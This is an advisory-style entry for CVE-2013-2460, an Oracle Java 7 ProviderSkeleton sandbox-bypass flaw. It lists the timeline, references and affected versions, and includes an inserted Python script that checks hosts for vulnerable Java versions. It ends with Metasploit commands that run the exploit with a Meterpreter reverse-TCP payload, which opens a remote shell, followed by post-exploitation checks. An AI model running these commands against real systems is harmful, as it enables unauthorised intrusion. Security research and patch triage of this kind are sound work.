Timeline :
Vulnerability discovered and reported to the vendor by Adam Gowdiak on 2013-04-22 (Issue 61)
Vulnerability corrected by the vendor on 2013-06-18
Metasploit PoC provided on 2013-06-24
PoC provided by Adam Gowdiak on 2013-07-18
PoC provided by :
Adam Gowdiak
Matthias Kaiser
Reference(s) :
CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013
Affected version(s) :
Oracle Java SE 7 Update 21 and before
Tested on Windows XP Pro SP3 with :
Java SE 7 Update 17
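To check an estate against the affected range listed above, the following added example (not part of the original post or of Metasploit) classifies `java -version` output per host. The host names, sample outputs and function names are constructed for illustration; only the "Java SE 7 Update 21 and before" boundary comes from this page, so other Java families are reported as unknown.

```python
import re

# From the page: Oracle Java SE 7 Update 21 and before are affected.
LAST_AFFECTED_JAVA7_UPDATE = 21

# Legacy version strings: 1.7.0, 1.7.0_17, 1.7.0_21-b11 ...
_VERSION_RE = re.compile(r'\b1\.(\d+)\.0(?:_(\d+))?')


def parse_java_version(text):
    """Return (family, update) from `java -version` output, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    # A bare "1.7.0" is the initial release, i.e. update 0.
    return int(m.group(1)), int(m.group(2) or 0)


def assess(text):
    """Return 'affected', 'not-affected' or 'unknown' for one host."""
    parsed = parse_java_version(text)
    if parsed is None:
        return 'unknown'          # no parsable version string
    family, update = parsed
    if family != 7:
        return 'unknown'          # the page only states the Java SE 7 range
    if update <= LAST_AFFECTED_JAVA7_UPDATE:
        return 'affected'
    return 'not-affected'


# Constructed sample inventory (hypothetical hosts and outputs).
SAMPLE_INVENTORY = {
    'ws-01': 'java version "1.7.0_17"\n'
             'Java(TM) SE Runtime Environment (build 1.7.0_17-b02)',
    'ws-02': 'java version "1.7.0_25"',
    'ws-03': 'java version "1.7.0"',
    'ws-04': 'java version "1.6.0_45"',
    'ws-05': 'java: command not found',
}


def triage(inventory):
    """Map each host to its verdict."""
    return {host: assess(out) for host, out in inventory.items()}


if __name__ == '__main__':
    for host, verdict in sorted(triage(SAMPLE_INVENTORY).items()):
        print(host, verdict)
```

A host can carry several JREs, so run the check against every installed runtime and browser plug-in, not only the one on the PATH.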
Description :
This module abuses the insecure invoke() method of the ProviderSkeleton class, which allows arbitrary static methods to be called with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.
Commands :
use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit
sysinfo
getuid